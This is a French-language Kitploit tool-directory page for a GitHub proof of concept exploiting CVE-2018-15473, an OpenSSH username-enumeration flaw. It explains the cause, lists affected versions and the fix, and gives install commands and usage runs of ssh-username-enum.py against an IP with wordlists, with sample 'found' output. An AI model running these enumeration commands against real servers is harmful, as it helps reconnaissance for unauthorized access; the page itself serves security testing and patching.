Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
CVE-2018-15473 — Outil d'énumération de noms d'utilisateur SSH exploitant CVE-2018-15473 pour identifier les utilisateurs valides sur les serveurs OpenSSH via un contournement d'authentification basé sur le timing. | Kitploit
Outils/GitHubGitHub/1stpeak/cve-2018-15473
ReconnaissanceAnalyse des VulnérabilitésExploitationCollecte d'InformationsSécurité RéseauTests d'Intrusion
GitHub1stpeak/cve-2018-15473

CVE-2018-15473

Outil d'énumération de noms d'utilisateur SSH exploitant CVE-2018-15473 pour identifier les utilisateurs valides sur les serveurs OpenSSH via un contournement d'authentification basé sur le timing.

Voir le dépôt
il y a 5 ansPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

CVE-2018-15473

Cause

Le serveur OpenSSH ne retarde pas le traitement d'un utilisateur invalide avant d'avoir complètement analysé le paquet contenant la requête. Cette vulnérabilité est liée à auth2-gss.c, auth2-hostbased.c, auth2-pubkey.c.

Exploitation

Bien que cette vulnérabilité ne puisse pas être utilisée pour générer une liste d'utilisateurs valides, elle peut néanmoins être utilisée pour énumérer et deviner des noms d'utilisateurs.

Versions affectées

OpenSSH <= 7.7

Versions non affectées

openssh-7.8p1-1.fc28 openssh-7.6p1-6.fc27

Installation du PoC

Vous devrez peut-être installer le paquet openssl-dev équivalent de votre distribution.

root@kitploit:~
# 注意:如果您在kali上安装,则可以跳过pip安装,只需执行下面第一二三行的步骤,因为paramiko已经存在。 
git clone https://github.com/1stPeak/CVE-2018-15473.git
cd CVE-2018-15473
chmod u+x ssh-username-enum.py
pip install -r requirements.txt 
# 或者使用以下命令下载安装 
pipenv install -r requirements.txt  # if you're cool like that   
chmod u+x ssh-username-enum.py

Exemples d'utilisation

Exemple 1 : Énumération d'un seul utilisateur

root@kitploit:~
peak@kali:~/CVE-2018-15473$ ./ssh-username-enum.py -u root 192.168.1.2
[+] root found!

Exemple 2 : Énumération de plusieurs utilisateurs avec 10 threads (threads par défaut : 4)

root@kitploit:~
peak@kali:~/CVE-2018-15473$ ./ssh-username-enum.py -t 10 -w /usr/share/wordlists/metasploit/unix_users.txt 192.168.1.2
[+] man found!
[+] guest found!
[+] nobody found!
[!] SSH negotiation failed for user nobody4.
[+] lpadmin found!
etc.

Exemple 3 : Adresse IPv6 avec port SSH spécifié

root@kitploit:~
peak@kali:~/CVE-2018-15473$ ./ssh-username-enum.py -t 10 -w /usr/share/wordlists/metasploit/unix_users.txt 192.168.1.2 '::1'
[+] ROOT found!
[+] syslog found!
[+] sslh found!
[!] SSH negotiation failed for user sssd.
[+] rfindd found!
[+] ultra found!
etc.

Solution

Il est recommandé aux utilisateurs de mettre à jour vers une version non affectée. Le projet OpenBSD a publié un correctif source au lien suivant : https://github.com/openbsd/src/commit/779974d35b4859c07bc3cb8a12c74b43b0a7d1e0

Références

https://github.com/epi052/cve-2018-15473
http://blog.nsfocus.net/openssh-cve-2018-15919/

Télécharger l’outil